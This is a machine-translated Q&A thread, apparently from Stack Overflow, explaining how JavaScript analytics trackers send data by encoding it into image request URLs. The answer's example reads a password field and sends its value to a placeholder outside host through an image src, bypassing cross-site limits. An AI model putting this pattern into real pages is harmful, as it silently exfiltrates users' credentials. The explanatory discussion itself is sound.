4
任何人都知道谷歌分析或Clicky是如何工作的?任何人都知道Javascript Web Analytics跟蹤器是如何工作的?
我一直在搜索整個http://static.getclicky.com/js文件,但沒有發現任何服務器請求。它如何發送數據而不影響其自身的安全性?否則用戶可以通過修改js發送錯誤的數據。
A
回答
4
圖片:這些庫在編碼所有他們想要的跟蹤信息時使用一種技巧,將其附加到圖像URL並通過請求圖像「發送」它。服務器端解析該圖像文件名解碼信息。
假設你有,你想從mydomain.com發送到somedomain.com密碼字段:
var t = document.getElementById('p').value;
var i = document.createElement('img');
i.src = 'http://somedomain.com/imagescript.php?p=' + t;
<input type='password' id='p' />
這個JavaScript可以通過違反跨站點限制發送內容
跨站點腳本編寫限制不適用於圖像,並且當您在JavaScript中編寫圖像URL請求時,世界上沒有任何瀏覽器或邏輯可以說明所有可能性。假設我們很幸運,GA是符合道德規範的,並且不會妨礙表單域。
相關問題
- 1. 任何人都知道使用Postgresql的免費bug跟蹤器?
- 2. 任何人都知道ACTION_RF_FIELD_ON_DETECTED?
- 3. 任何人都知道Rhomobile?
- 4. 任何人都知道VRTX
- 5. 任何人都知道DirectoryEntry.Invoke
- 6. 任何人都知道如何讓nicescroll插件水平工作
- 7. 任何人都知道TabStop如何在iText中工作5.5.0
- 8. 任何人都知道nosetest的-m,-i和-e是如何工作的?
- 9. 任何人都知道CMU的IntraFace的面部特徵跟蹤算法嗎?
- 10. 任何一個人都知道List <ICompareable> .Sort()是如何工作的?
- 11. 任何人都可以知道如何使用JavaScript
- 12. 任何人都知道如何 - >轉儲()的作品?
- 13. 任何人都知道像PHP的RSPec?
- 14. Javascript微調器。任何人都知道嗎?
- 15. 任何人都知道Google分析是如何實施的?
- 16. 任何人都知道LGPL圖像轉換器命令工具?
- 17. 任何人都知道如何解決選擇器錯誤?
- 18. 任何人都知道Click Framework?
- 19. 任何人都知道Objective-C Stylus Parser?
- 20. 任何人都知道如何檢查視覺工作室中的熱鍵
- 21. 任何人都知道是否存在開源SQL解析器?
- 22. 任何人都知道一個好的JavaScript UI(Widget)庫
- 23. 你知道任何即時/獨立的錯誤跟蹤器嗎?
- 24. 任何人都知道什麼是親人?
- 25. 任何人都知道Nvidia的GPU是大還是小端?
- 26. 任何人都知道這是爲什麼:在IE9之後CSS不工作?
- 27. 任何人都知道codeigniter的任何好的教程?
- 28. 任何人都知道Qa網站的工具?
- 29. 任何人都知道一個好的網絡調試工具?
- 30. 谷歌Analytics(分析)跟蹤器不在ASP.NET網站工作
哇,這是一個不錯的。但是i.src發生了什麼?它被丟棄了嗎? 如果他們不得不提取數據,例如用戶/瀏覽器信息/引用網址等的IP地址,它是在PHP文件中完成還是通過JavaScript? –
某些信息(瀏覽器代理,IP地址,可能是指URL)是從HTTP頭被動收集的。其他信息(如頁面標題)會在圖像URL中進行編碼,服務器端處理將對其進行解碼。 – pp19dd
非常感謝您的回答。但爲什麼這麼多的編碼只是爲了發送一堆變量?我無法弄清楚它是什麼,但我想數據在發送之前進行編碼以避免欺騙性條目。 –